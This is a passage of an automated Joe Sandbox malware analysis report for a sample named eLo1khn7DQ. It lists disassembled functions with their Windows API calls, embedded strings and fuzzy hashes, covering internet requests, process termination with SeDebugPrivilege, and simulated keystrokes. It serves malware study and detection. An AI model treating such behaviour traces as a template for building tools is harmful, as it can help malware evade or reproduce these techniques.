_free.LIBCMT ref: 00222CA0
_free.LIBCMT ref: 00222CAB
_free.LIBCMT ref: 00222CB6
_free.LIBCMT ref: 00222CC1
_free.LIBCMT ref: 00222CCC
_free.LIBCMT ref: 00222CD7
_free.LIBCMT ref: 00222CE2
_free.LIBCMT ref: 00222CED
_free.LIBCMT ref: 00222CFB

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ea81eea7e0fbf6b30ee7243fab7e77cdec69dc93c192af80c9aef186e31d00c0
Instruction ID: 3ecb5ea8f6d7910e97437db4a2fc26372740a4177761e98a9bc9e2b99f445b05
Opcode Fuzzy Hash: ea81eea7e0fbf6b30ee7243fab7e77cdec69dc93c192af80c9aef186e31d00c0
Instruction Fuzzy Hash: DC119676120118FFCB02EF94E842DDD3BA5FF09350F9154A5F9485B222D632EAA49F90

Function 001F1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001F1459
OleUninitialize.OLE32(?,00000000), ref: 001F14F8
UnregisterHotKey.USER32(?), ref: 001F16DD
DestroyWindow.USER32(?), ref: 002324B9
FreeLibrary.KERNEL32(?), ref: 0023251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0023254B

Strings

close all, xrefs: 001F1454

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 7111e452d12191a8a57cbb7829c8b53801e4f858155578e517d84a7d1449e07f
Instruction ID: 7693da5b1a0fb44edf9389445762a224a986e7e46e736bcd7a14482f02b30785
Opcode Fuzzy Hash: 7111e452d12191a8a57cbb7829c8b53801e4f858155578e517d84a7d1449e07f
Instruction Fuzzy Hash: B3D1AE71712212DFCB29EF14D499B39F7A4BF05700F6541ADE94AAB292CB30AD26CF50

Function 001F5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 001F5C7A

Part of subcall function 001F5D0A: GetClientRect.USER32(?,?), ref: 001F5D30
Part of subcall function 001F5D0A: GetWindowRect.USER32(?,?), ref: 001F5D71
Part of subcall function 001F5D0A: ScreenToClient.USER32(?,?), ref: 001F5D99

GetDC.USER32 ref: 002346F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00234708
SelectObject.GDI32(00000000,00000000), ref: 00234716
SelectObject.GDI32(00000000,00000000), ref: 0023472B
ReleaseDC.USER32(?,00000000), ref: 00234733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002347C4

Strings

U, xrefs: 00234693

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 25da14deec20f89e9c5327d066fab55fb92c79e6504c4eca47848206f617e303
Instruction ID: 33ad99b3a5d34be4e565c3ddfdf897a4b272da653b768ae5ef52e9ba50fc7f93
Opcode Fuzzy Hash: 25da14deec20f89e9c5327d066fab55fb92c79e6504c4eca47848206f617e303
Instruction Fuzzy Hash: D471157441020ADFCF21AF64CD85ABA7BBAFF4A350F1402A5EE565A1A6C330AC61DF50

Function 0026359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002635E4

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

LoadStringW.USER32(002C2390,?,00000FFF,?), ref: 0026360A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00263724
Line %d (File "%s"):, xrefs: 0026366B
^ ERROR, xrefs: 002636C9
Error: , xrefs: 002636EF
"%s" (%d) : ==> %s:, xrefs: 00263742

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 34ac8c43a0ea1a1312bff38fe2d74cc6026d725f2656466f5c289fd4a225448f
Instruction ID: 8d1f0948ec2862b500e3dff3d1a43982c56bd45bc04b7ec0dc7cd7b06a2d0f87
Opcode Fuzzy Hash: 34ac8c43a0ea1a1312bff38fe2d74cc6026d725f2656466f5c289fd4a225448f
Instruction Fuzzy Hash: E2517E7181021EAADF15EFA0DC46EFEBB78EF15344F144165F605721A2EB311AA8DF60

Function 0026C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0026C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0026C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0026C2CA
GetLastError.KERNEL32 ref: 0026C322
SetEvent.KERNEL32(?), ref: 0026C336
InternetCloseHandle.WININET(00000000), ref: 0026C341

Strings

, xrefs: 0026C2BB

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 75cc1eb1c87043ce6fa011fffb53cc25cba113de7bfb340a273bb4826f03d204
Instruction ID: 0cfdba8a36175f9d5fae0eb85f8b3880636c5079253d5b2a9ec879f4fd4aeef5
Opcode Fuzzy Hash: 75cc1eb1c87043ce6fa011fffb53cc25cba113de7bfb340a273bb4826f03d204
Instruction Fuzzy Hash: 54317175611208AFD721AF649C88ABB7BFCEB49744B24855EF88692300DB34DDA49B70

Function 0025989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00233AAF,?,?,Bad directive syntax error,0028CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 002598BC
LoadStringW.USER32(00000000,?,00233AAF,?), ref: 002598C3

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00259987

Strings

Line %d (File "%s"):, xrefs: 0025992D
., xrefs: 0025996D
%s (%d) : ==> %s.: %s %s, xrefs: 002598F1
Error: , xrefs: 00259955
Line %d:, xrefs: 00259912

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 9c4f3016f5977608f50731d4b11b4d450068ce2f41a76c55e83749d4f1d8a177
Instruction ID: 854175bcc4a701a7e68e92f8e8429c5efbb5f73a10c2403f8216ca69d50e2bca
Opcode Fuzzy Hash: 9c4f3016f5977608f50731d4b11b4d450068ce2f41a76c55e83749d4f1d8a177
Instruction Fuzzy Hash: 2B217E3182021EEBCF11EF90CC0AEFE7779BF28745F044465F615660A2EB759668DB20

Function 0025209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 002520AB
GetClassNameW.USER32(00000000,?,00000100), ref: 002520C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0025214D

Strings

SHELLDLL_DefView, xrefs: 002520CC
details, xrefs: 002520FB
largeicons, xrefs: 002520E1
list, xrefs: 0025212F
smallicons, xrefs: 00252115

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 0d56ac335c71b667090df53957ed8397366fe1dd4649dcc7dfa6c8a4538f073e
Instruction ID: a98a71df8b70513820a1ae9ea7fb162b208551ec4e3f119f5a883177e20b2e36
Opcode Fuzzy Hash: 0d56ac335c71b667090df53957ed8397366fe1dd4649dcc7dfa6c8a4538f073e
Instruction Fuzzy Hash: A511087A2B8B17F5F6053620AC06EE7339CCF16355B204015FE08A40D2FAB158795A18

Function 0022CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0022CEB7
_free.LIBCMT ref: 0022CF22
_free.LIBCMT ref: 0022CF48
_free.LIBCMT ref: 0022CF71
_free.LIBCMT ref: 0022CFA9
_free.LIBCMT ref: 0022CFDA
_free.LIBCMT ref: 0022D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0022D09C
_free.LIBCMT ref: 0022D0B5

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: bc5de3d7bc5639feba4aa3b53bcb7b1a4a558174035f3c1cd81d22431d4d118b
Instruction ID: 07376be28c9e2e2ce8ec4f189f563476add5730432fc03127bcec35cb9cd81e5
Opcode Fuzzy Hash: bc5de3d7bc5639feba4aa3b53bcb7b1a4a558174035f3c1cd81d22431d4d118b
Instruction Fuzzy Hash: D8615771924322FFDB21AFF4BD85A6D7BA5EF05310F24026EF80597291E6729D608B90

Function 002850D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00285186
ShowWindow.USER32(?,00000000), ref: 002851C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 002851CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 002851D1

Part of subcall function 00286FBA: DeleteObject.GDI32(00000000), ref: 00286FE6

GetWindowLongW.USER32(?,000000F0), ref: 0028520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0028521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0028524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00285287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00285296

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: c1b3a5f3b782cbd31562b42e5af33e2f5341f32c9022df57cb3334daab3cd4f6
Instruction ID: f44c4ece9431768f671bfaa0f935beb20ba81527375ea312fbefede844397069
Opcode Fuzzy Hash: c1b3a5f3b782cbd31562b42e5af33e2f5341f32c9022df57cb3334daab3cd4f6
Instruction Fuzzy Hash: 2851C338A72A29FEEF20AF24CC4DBD87B65BB05321F144011F919962E1CB7599B0DF50

Function 00208B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00246890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002468A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002468B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002468D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002468F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00208874,00000000,00000000,00000000,000000FF,00000000), ref: 00246901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0024691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00208874,00000000,00000000,00000000,000000FF,00000000), ref: 0024692D

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 90b241c14ad89eafb7e9847d3dbe7e9b81dac5c7fb2508a2aaec4a70eef4e77d
Instruction ID: 0b75da1b32696276100a43b0590f1bdbab5e72b29f2d2ac9bc7d3a5a147af984
Opcode Fuzzy Hash: 90b241c14ad89eafb7e9847d3dbe7e9b81dac5c7fb2508a2aaec4a70eef4e77d
Instruction Fuzzy Hash: 1151887062030AEFDB24CF24DC59FAA7BB5EB59354F204518F942D62E1DBB0E9A0DB50

Function 0026C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0026C182
GetLastError.KERNEL32 ref: 0026C195
SetEvent.KERNEL32(?), ref: 0026C1A9

Part of subcall function 0026C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0026C272
Part of subcall function 0026C253: GetLastError.KERNEL32 ref: 0026C322
Part of subcall function 0026C253: SetEvent.KERNEL32(?), ref: 0026C336
Part of subcall function 0026C253: InternetCloseHandle.WININET(00000000), ref: 0026C341

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 7e7cda802d090d36007f4b10cb888ebbc7548eb6008daa059248e2cf06022986
Instruction ID: e339fa837b7a0cd4bdf80ab594feded10f7f5be132e2b0c99519149b629ac87f
Opcode Fuzzy Hash: 7e7cda802d090d36007f4b10cb888ebbc7548eb6008daa059248e2cf06022986
Instruction Fuzzy Hash: 06318175111605AFDB21AFA5EC58A77BBF8FF58300B24841EFD9A82610D731E8649F60

Function 002525A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00253A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00253A57
Part of subcall function 00253A3D: GetCurrentThreadId.KERNEL32 ref: 00253A5E
Part of subcall function 00253A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002525B3), ref: 00253A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 002525BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002525DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002525DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 002525E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00252601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00252605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0025260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00252623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00252627

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 7029ac3ab03c8ad7904ff23337fa666535633ba30e86161079b455741961793c
Instruction ID: 53d74d1bb08fbcac401321615e5afe5a3918db935fd7d0e505da963f667ec5c4
Opcode Fuzzy Hash: 7029ac3ab03c8ad7904ff23337fa666535633ba30e86161079b455741961793c
Instruction Fuzzy Hash: C801D8317A0220BBFB1067689CCEF593F5DDB4EB52F200011F718AE0D5CAF114588A79

Function 00251803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00251449,?,?,00000000), ref: 0025180C
HeapAlloc.KERNEL32(00000000,?,00251449,?,?,00000000), ref: 00251813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00251449,?,?,00000000), ref: 00251828
GetCurrentProcess.KERNEL32(?,00000000,?,00251449,?,?,00000000), ref: 00251830
DuplicateHandle.KERNEL32(00000000,?,00251449,?,?,00000000), ref: 00251833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00251449,?,?,00000000), ref: 00251843
GetCurrentProcess.KERNEL32(00251449,00000000,?,00251449,?,?,00000000), ref: 0025184B
DuplicateHandle.KERNEL32(00000000,?,00251449,?,?,00000000), ref: 0025184E
CreateThread.KERNEL32(00000000,00000000,00251874,00000000,00000000,00000000), ref: 00251868

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: c35796204ab2b25ae5ca181a07b12d29f2ffdd4d86d023b2fda03a165c0f5a8f
Instruction ID: 5cf3e0bdf7c91906b556cf115fd2e6a7e085923876b257821582c05e8128e3c9
Opcode Fuzzy Hash: c35796204ab2b25ae5ca181a07b12d29f2ffdd4d86d023b2fda03a165c0f5a8f
Instruction Fuzzy Hash: 8101BF75241304BFE710ABA5EC8DF573B6CEB89B11F104411FA05DB192D7719810CB30

Function 0027A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0025D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0025D501
Part of subcall function 0025D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0025D50F
Part of subcall function 0025D4DC: CloseHandle.KERNEL32(00000000), ref: 0025D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0027A16D
GetLastError.KERNEL32 ref: 0027A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0027A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0027A268
GetLastError.KERNEL32(00000000), ref: 0027A273
CloseHandle.KERNEL32(00000000), ref: 0027A2C4

Strings

SeDebugPrivilege, xrefs: 0027A18F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 1dba0be66aab07d9e14a374d4c6a45a9118c15c77f1b98cc5c0e49bc595129b4
Instruction ID: 2f9b0b8a6c59c7a0cf0a1a8b64669d33b817052904f399e0c4578ec6362ded63
Opcode Fuzzy Hash: 1dba0be66aab07d9e14a374d4c6a45a9118c15c77f1b98cc5c0e49bc595129b4
Instruction Fuzzy Hash: BB61B331215242AFD710DF18C494F29BBE1AF94328F54C49CE85A4B7A3C772EC55CB92

Function 00283886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00283925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0028393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00283954
_wcslen.LIBCMT ref: 00283999
SendMessageW.USER32(?,00001057,00000000,?), ref: 002839C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 002839F4

Strings

SysListView32, xrefs: 002838F7

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: e778a1066167348aaded1d78a66a7b2c5a5172e0d0eb9acc079b10d61140f77e
Instruction ID: a43a7c4a33b1087b17a5aae1c77d28cd890c4d6e0048e1e76633cbcfb5fecbab
Opcode Fuzzy Hash: e778a1066167348aaded1d78a66a7b2c5a5172e0d0eb9acc079b10d61140f77e
